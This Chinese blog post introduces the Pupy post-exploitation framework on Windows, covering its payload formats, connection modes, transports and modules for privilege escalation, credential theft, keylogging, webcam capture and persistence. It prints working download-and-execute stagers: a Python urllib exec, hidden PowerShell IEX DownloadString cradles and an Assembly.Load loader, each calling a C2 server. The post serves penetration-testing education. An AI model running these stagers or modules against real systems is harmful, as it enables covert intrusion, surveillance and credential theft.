I"U<h2 id="0x00-前言">0x00 前言</h2>
<hr />

<p><a href="https://github.com/n1nj4sec/pupy">Pupy</a>是使用Python开发的跨平台远程管理和后期开发工具，支持很多实用的功能。</p>

<p>本文将要对Pupy在Windows平台的启动文件类型、连接方式和通信协议进行介绍，将其中的后渗透模块进行分类，逐个介绍功能</p>

<h2 id="0x01-简介">0x01 简介</h2>
<hr />

<p>本文将要介绍以下内容：</p>

<ul>
  <li>安装方法</li>
  <li>支持的启动文件类型</li>
  <li>支持的连接方式</li>
  <li>支持的通信协议</li>
  <li>后渗透模块介绍</li>
</ul>

<h2 id="0x02-安装方法">0x02 安装方法</h2>
<hr />

<h3 id="1-使用docker">1. 使用docker</h3>

<p>说明文档：</p>

<p>https://github.com/n1nj4sec/pupy/wiki/Installation</p>

<h3 id="2直接安装">2.直接安装</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyws
pupyws/bin/pupysh
</code></pre></div></div>

<p><strong>注:</strong></p>

<p>使用<code class="language-plaintext highlighter-rouge">-DG</code>参数将从https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz下载模板文件</p>

<h2 id="0x03-支持的启动文件类型">0x03 支持的启动文件类型</h2>
<hr />

<p>启动pupy后，输入<code class="language-plaintext highlighter-rouge">gen -h</code>获得生成启动文件的说明，如下图</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-4-8/2-1.png" alt="Alt text" /></p>

<p>这里逐个进行介绍</p>

<h3 id="1client">1.client</h3>

<p>生成exe格式的文件</p>

<p>生成64位exe文件的命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f client -A x64
</code></pre></div></div>

<p>这个命令将从<code class="language-plaintext highlighter-rouge">pupy/pupy/payload_templates/</code>读取模板文件，添加配置信息后生成最终的exe文件</p>

<p><strong>注：</strong></p>

<p>上述命令对应的模板文件名称为pupyx64.exe，模板文件对应的下载链接：https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz</p>

<h3 id="2py">2.py</h3>

<p>生成一个完全打包的Python文件（所有依赖项都从内存打包并执行）</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f py
</code></pre></div></div>

<p>这个命令会生成一个Python文件，内容的格式如下：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import zlib,marshal;exec marshal.loads(zlib.decompress('xxxxxxxxx')
</code></pre></div></div>

<p>其中<code class="language-plaintext highlighter-rouge">'xxxxxxxxx'</code>为加密的内容</p>

<p>加密的方法大致为使用<code class="language-plaintext highlighter-rouge">marshal.dumps</code>对代码进行序列化，再加上偏移、异或等操作，具体加密算法可参考：</p>

<p>https://github.com/n1nj4sec/pupy/blob/5b9529a0ea07bb4246a57bfb1c1129010c948931/pupy/pupylib/utils/obfuscate.py#L9</p>

<p>如果想要取消加密过程并获得源文件，可以加上<code class="language-plaintext highlighter-rouge">--debug</code>参数，示例如下：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f py --debug
</code></pre></div></div>

<p>对应代码位置：https://github.com/n1nj4sec/pupy/blob/5b9529a0ea07bb4246a57bfb1c1129010c948931/pupy/pupylib/payloads/py_oneliner.py#L43</p>

<p>代码判断逻辑如下：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if debug:
    return payload
return compress_encode_obfs(payload, main=True)
</code></pre></div></div>

<p>如果要在Windows系统的Python环境下运行这个Python文件，Windows系统还需要安装以下模块：</p>

<ul>
  <li>pywin32</li>
  <li>pycryptodome</li>
  <li>Crypto</li>
</ul>

<p><strong>注：</strong></p>

<p>Crypto包需要从http://www.voidspace.org.uk/python/modules.shtml#pycrypto 处下载</p>

<h3 id="3pyinst">3.pyinst</h3>

<p>生成与pyinstaller兼容的Python文件</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f pyinst
</code></pre></div></div>

<p>同<code class="language-plaintext highlighter-rouge">gen -f py</code>的区别：添加了一些头文件，便于使用pyinstaller将Python脚本转换成exe文件</p>

<p>在之前的文章<a href="https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91">《本地密码查看工具LaZagne中的自定义脚本开发》</a>介绍过pyinstaller的用法</p>

<h3 id="4py_oneliner">4.py_oneliner</h3>

<p>通过urllib库从服务器下载Python代码并执行</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f py_oneliner
</code></pre></div></div>

<p>在命令行输出下载执行的代码，示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python -c 'import urllib;exec urllib.urlopen("http://192.168.1.1:9000/a0py9Yz5pi/Sg11A11q2J").read()'
</code></pre></div></div>

<h3 id="5ps1">5.ps1</h3>

<p>生成powershell格式的启动代码，执行时会先启动Powershell进程，然后在Powershell进程中加载dll</p>

<p>生成32位文件的命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f ps1
</code></pre></div></div>

<p>这个命令将从<code class="language-plaintext highlighter-rouge">pupy/pupy/payload_templates/</code>读取dll的模板文件，添加配置信息和经过混淆的<a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1">Invoke-ReflectivePEInjection</a>代码，最终实现在Powershell进程中加载dll</p>

<p><strong>注：</strong></p>

<p>上述命令对应的模板文件名称为pupyx86.dll</p>

<h3 id="6ps1_oneliner">6.ps1_oneliner</h3>

<p>通过<code class="language-plaintext highlighter-rouge">IEX(New-Object Net.WebClient).DownloadString</code>从服务器下载powershell代码并执行</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f ps1_oneliner
</code></pre></div></div>

<p>在命令行输出下载执行的代码，示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe -w hidden -noni -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.1:9000/DfsP5d2GPG/xDrhpNdNTU');"
</code></pre></div></div>

<p>在命令行输出执行base64编码的代码，示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe -w hidden -noni -nop -enc xxxxxxxxxxxxxxxxxxxx
</code></pre></div></div>

<h3 id="7rubber_ducky">7.rubber_ducky</h3>

<p>生成一个Rubber Ducky脚本和inject.bin文件</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f rubber_ducky
</code></pre></div></div>

<h3 id="8csharp">8.csharp</h3>

<p>生成C#文件(.cs格式)</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f csharp
</code></pre></div></div>

<p>这个命令将从<code class="language-plaintext highlighter-rouge">pupy/pupy/payload_templates/</code>读取dll格式的模板文件，添加配置信息，使用Casey Smith的PELoader从内存加载PE文件</p>

<p><strong>注：</strong></p>

<p>上述命令对应的模板文件名称为pupyx86.dll</p>

<p>C#文件的编译和使用方法可参考之前的文章<a href="https://3gstudent.github.io/%E9%80%9A%E8%BF%87.NET%E5%AE%9E%E7%8E%B0%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BDPE%E6%96%87%E4%BB%B6">《通过.NET实现内存加载PE文件》</a></p>

<h3 id="9net">9..NET</h3>

<p>生成C#文件(.cs格式)并通过mono编译，最终生成exe格式的文件</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f .NET
</code></pre></div></div>

<p><strong>注：</strong></p>

<p>需要安装mono开发环境，kali安装命令为<code class="language-plaintext highlighter-rouge">apt-get install mono-mcs</code></p>

<p>关于mono的使用可以参考之前的文章<a href="https://3gstudent.github.io/%E9%80%9A%E8%BF%87Mono(%E8%B7%A8%E5%B9%B3%E5%8F%B0.NET%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83)%E6%89%A7%E8%A1%8Cshellcode">《通过Mono(跨平台.NET运行环境)执行shellcode》</a></p>

<p>这个命令是在<code class="language-plaintext highlighter-rouge">gen -f csharp</code>的基础上，添加了使用mono编译的功能</p>

<h3 id="10net_oneliner">10..NET_oneliner</h3>

<p>通过powershell从内存加载.NET程序集</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gen -f .NET_oneliner
</code></pre></div></div>

<p>在命令行输出Powershell代码，示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell -w hidden -enc "xxxxxxxxxxxxxx"
</code></pre></div></div>

<p>这个命令是在<code class="language-plaintext highlighter-rouge">gen -f .NET</code>的基础上，添加了通过powershell从内存加载.NET程序集的功能</p>

<p>powershell从内存加载.NET程序集的实现代码如下：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Reflection.Assembly]::Load(""(new-object net.webclient).DownloadData(""'http://{link_ip}:{port}{landing_uri}')).GetTypes()[0].GetMethods("")[0].Invoke($null,@())"
</code></pre></div></div>

<p>之前的文章<a href="https://3gstudent.github.io/%E4%BB%8E%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BD.NET%E7%A8%8B%E5%BA%8F%E9%9B%86(Assembly.Load)%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">《从内存加载.NET程序集(Assembly.Load)的利用分析》</a>分析过从内存加载.NET程序集的方法</p>

<h3 id="补充额外的参数">补充：额外的参数</h3>

<p>对于生成的启动文件，还支持以下参数：</p>

<ul>
  <li>是否压缩</li>
  <li>是否使用系统代理</li>
  <li>设置连接次数和间隔时间</li>
  <li>设置启动前执行的Python脚本</li>
</ul>

<h2 id="0x04-支持的连接方式">0x04 支持的连接方式</h2>
<hr />

<p>支持以下四种：</p>

<ul>
  <li>bind，绑定端口，作为正向连接使用</li>
  <li>auto_proxy，检索可能的SOCKS/HTTP代理列表并使用，检索方法包括：注册表，WPAD请求，gnome设置，环境变量HTTP_PROXY</li>
  <li>dnscnc，dns协议？（这个功能暂时无法测试）</li>
  <li>connect，默认方式，反向连接到服务器</li>
</ul>

<h2 id="0x05-支持的通信协议">0x05 支持的通信协议</h2>
<hr />

<p>可通过命令<code class="language-plaintext highlighter-rouge">gen -l</code>获得列表</p>

<p>说明文档：</p>

<p>https://github.com/n1nj4sec/pupy/wiki/Get-Started#transport</p>

<p>目前支持以下类别：</p>

<ul>
  <li>obfs3</li>
  <li>http</li>
  <li>ssl</li>
  <li>ecm</li>
  <li>tcp_cleartext</li>
  <li>dfws</li>
  <li>rsa</li>
  <li>udp_secure</li>
  <li>kc4</li>
  <li>ec4</li>
  <li>ws</li>
  <li>scramblesuit</li>
  <li>udp_cleartext</li>
  <li>ssl_rsa</li>
</ul>

<p>以上类别的通信协议可以进行自定义，修改位置：<code class="language-plaintext highlighter-rouge">pupy/pupy/network/transports/&lt;transport_name&gt;/conf.py</code></p>

<h2 id="0x06-后渗透模块介绍">0x06 后渗透模块介绍</h2>
<hr />

<p>常用命令:</p>

<p>设置监听端口：<code class="language-plaintext highlighter-rouge">listen -a ssl 8443</code></p>

<p>查看会话：<code class="language-plaintext highlighter-rouge">sessions</code></p>

<p>切换会话：<code class="language-plaintext highlighter-rouge">sessions -i &lt;id&gt;</code></p>

<p>结束会话：<code class="language-plaintext highlighter-rouge">sessions -k &lt;id&gt;</code></p>

<p>用法实例如下图</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-4-8/3-1.png" alt="Alt text" /></p>

<p>获得session后输入<code class="language-plaintext highlighter-rouge">help -M</code>可以显示支持的后渗透模块，这里将其中的后渗透模块进行分类，逐个介绍功能</p>

<h3 id="1提权">1.提权</h3>

<p>(1)使用beroot获得可用来提权的信息，模块：beroot</p>

<p>源码地址：https://github.com/AlessandroZ/BeRoot</p>

<p>(2)使用WinPwnage尝试提权，模块：bypassuac</p>

<p>源码地址：https://github.com/rootm0s/WinPwnage</p>

<p>(3)切换至system权限，模块：getsystem</p>

<p>(4)使用WindowsPowerShell ADIDNS/LLMNR/mDNS/NBNS欺骗者/中间人工具Inveigh，模块：inveigh</p>

<p>源码地址：https://github.com/Kevin-Robertson/Inveigh</p>

<h3 id="2进程">2.进程</h3>

<p>(1)列出/模拟进程token，模块：impersonate</p>

<p>关于token的利用方法可以参考之前的文章<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8">《渗透技巧——Token窃取与利用》</a></p>

<p>(2)获得当前权限，模块：getprivs</p>

<p>关于权限的利用方法可以参考之前的文章<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8">《渗透技巧——Windows九种权限的利用》</a></p>

<p>(3)获得当前进程的父进程，模块：getppid</p>

<p>通过父进程进行权限切换可以参考之前的文章<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8EAdmin%E6%9D%83%E9%99%90%E5%88%87%E6%8D%A2%E5%88%B0System%E6%9D%83%E9%99%90">《渗透技巧——从Admin权限切换到System权限》</a></p>

<h3 id="3凭据获取">3.凭据获取</h3>

<p>(1)使用Lazagne获取凭据，模块：lazagne</p>

<p>源码地址：https://github.com/AlessandroZ/LaZagne/</p>

<p>之前的文章<a href="https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91">《本地密码查看工具LaZagne中的自定义脚本开发》</a>曾介绍过LaZagne</p>

<p>(2)从注册表导出本地用户hash，模块：creddump</p>

<p>相关细节可以参考之前的文章<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87SAM%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8E%B7%E5%BE%97%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7hash">《渗透技巧——通过SAM数据库获得本地用户hash》</a></p>

<p>(3)监控内存并查找明文凭据，模块：loot_memory</p>

<p>开启后会持续监控内存</p>

<p>(4)从进程内存dump可打印的字符串以供进一步分析，模块：memstrings</p>

<p>可以针对指定进程，输出的格式为文本文件</p>

<h3 id="4网络相关">4.网络相关</h3>

<p>(1)通过HTTP协议发送Get/Post请求，模块：http</p>

<p>(2)TCP端口扫描，模块：port_scan</p>

<p>(3)端口转发和socks代理，模块：forward</p>

<p>(4)抓包，模块：tcpdump</p>

<p>(5)UPnP操作，模块：igd</p>

<p>(6)从服务器获得证书，模块：x509</p>

<h3 id="5屏幕控制">5.屏幕控制</h3>

<p>(1)通过浏览器控制目标屏幕的模块：rdesktop</p>

<p>加载后，通过浏览器能够控制目标的屏幕，如下图</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-4-8/3-4.png" alt="Alt text" /></p>

<p>不仅能够查看屏幕内容，也能够发送鼠标和键盘消息</p>

<p><strong>注：</strong></p>

<p>这里不使用远程桌面协议(RDP)</p>

<p>(2)使用远程桌面协议(RDP)，模块：rdp</p>

<p>可以用来开启或关闭远程桌面连接，还支持用来验证远程主机的凭据</p>

<h3 id="6监控">6.监控</h3>

<p>(1)键盘和剪贴板记录，模块：keylogger</p>

<p>(2)记录鼠标点击并截图周围区域，模块：mouselogger</p>

<p>(3)截图，模块：screenshot</p>

<p>(4)麦克风录音，模块：record_mic</p>

<p>(5)摄像头拍照，模块：webcamsnap</p>

<h3 id="7获得系统信息">7.获得系统信息</h3>

<p>(1)查看日志，模块:logs</p>

<p>不同类型对应不同的颜色，如下图</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-4-8/3-3.png" alt="Alt text" /></p>

<p>(2)注册表，模块：reg</p>

<p>包括查询、增加、删除、修改、搜索操作</p>

<p>不同类型对应不同的颜色，如下图</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-4-8/3-2.png" alt="Alt text" /></p>

<p>(3)列出本地和远程共享文件夹及权限，模块：shares</p>

<p>(4)查看当前登录用户，模块：w</p>

<p>(5)获取服务信息，模块：services</p>

<p>(6)获取时间，模块：date</p>

<p>(7)检索EC2/DigitalOcean元数据，模块：cloudinfo</p>

<p>(8)查看和修改环境变量，模块：env</p>

<p>(9)虚拟机检测，模块：check_vm</p>

<p>支持识别以下虚拟机：</p>

<ul>
  <li>Hyper-V</li>
  <li>VMWare</li>
  <li>Virtual PC</li>
  <li>Virtual Box</li>
  <li>Xen Machine</li>
  <li>Qemu machine</li>
</ul>

<p>识别方法：查询注册表</p>

<h3 id="8执行python命令">8.执行Python命令</h3>

<p>(1)执行单条命令，模块：pyexec</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pyexec -c "import platform;print platform.uname()"
</code></pre></div></div>

<p>(2)在交互式shell中执行Python命令，模块：pyshell</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pyshell
import platform
print platform.uname()
</code></pre></div></div>

<p>(3)加载Python包，模块：load_package</p>

<h3 id="9执行cmd命令">9.执行cmd命令</h3>

<p>(1)通过subprocess执行cmd命令，模块：shell_exec</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shell_exec whoami
</code></pre></div></div>

<p>(2)在线程上执行的简单popen调用（速度慢但更安全），模块：pexec</p>

<p>命令示例：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pexec whoami
</code></pre></div></div>

<p>(3)交互式shell，模块：interactive_shell</p>

<p>修改自<a href="https://github.com/alxchk/winpty">winpty</a></p>

<p>(4)执行shellcode，模块：shellcode_exec</p>

<p>(5)内存执行文件，模块：memory_exec</p>

<h3 id="10远程执行cmd命令">10.远程执行cmd命令</h3>

<p>使用smbexec/wmiexec实现远程执行命令，模块：psexec</p>

<p>支持使用hash</p>

<h3 id="11维持权限">11.维持权限</h3>

<p>(1)持久化，模块：persistence</p>

<p>更多方式可参考：https://github.com/3gstudent/Pentest-and-Development-Tips#tips-30-windows-persistence</p>

<p>(2)复制当前Session，模块：duplicate</p>

<p>(3)迁移进程，模块：migrate</p>

<h3 id="12mimikatz">12.mimikatz</h3>

<p>(1)内存加载mimikatz，执行单条命令，模块：mimikatz</p>

<p>(2)内存加载mimikatz，交互式，模块：mimishell</p>

<h3 id="13powerview">13.powerview</h3>

<p>(1)直接调用，模块：powerview</p>

<p>(2)使用Python重写，模块：pywerview</p>

<h3 id="14文件操作">14.文件操作</h3>

<p>(1)上传，模块：upload</p>

<p>(2)下载，模块：download</p>

<p>(3)查看文件或文件夹的属性，模块：stat</p>

<p>(4)编辑文件，模块：edit</p>

<p>(5)写入文件，模块：write</p>

<p>(6)使用<code class="language-plaintext highlighter-rouge">Windows Search Index</code>搜索文件，模块：isearch</p>

<p>(7)搜索指定目录下所有文件中的字符，模块:search</p>

<p>(8)通过SMB协议访问文件共享，模块:smb</p>

<p>(9)连接远程共享目录并搜索文件，模块:smbspider</p>

<h3 id="15ssh客户端">15.ssh客户端</h3>

<p>(1)连接远程ssh服务器并执行命令，模块:ssh</p>

<p>(2)连接远程ssh服务器获得完整交互式会话，模块:sshell</p>

<h3 id="16outlook">16.outlook</h3>

<p>与目标用户的Outlook会话交互，模块：outlook</p>

<h3 id="17压缩与解压缩">17.压缩与解压缩</h3>

<p>zip压缩与解压缩，模块：zip</p>

<h3 id="18锁屏">18.锁屏</h3>

<p>模块：lock_screen</p>

<h3 id="19查看回连session的信息">19.查看回连Session的信息</h3>

<p>(1)获得所有Session的网络信息，模块：netstat</p>

<p>(2)获得当前Session的信息，模块：get_info</p>

<p>(3)查看已获得的凭据信息，命令：creds</p>

<p>(4)查看server的配置信息，命令：config</p>

<h2 id="0x07-小结">0x07 小结</h2>
<hr />

<p>本文介绍了Pupy在Windows平台下的启动文件类型、连接方式和通信协议，将其中的后渗透模块进行分类，逐个介绍功能。</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET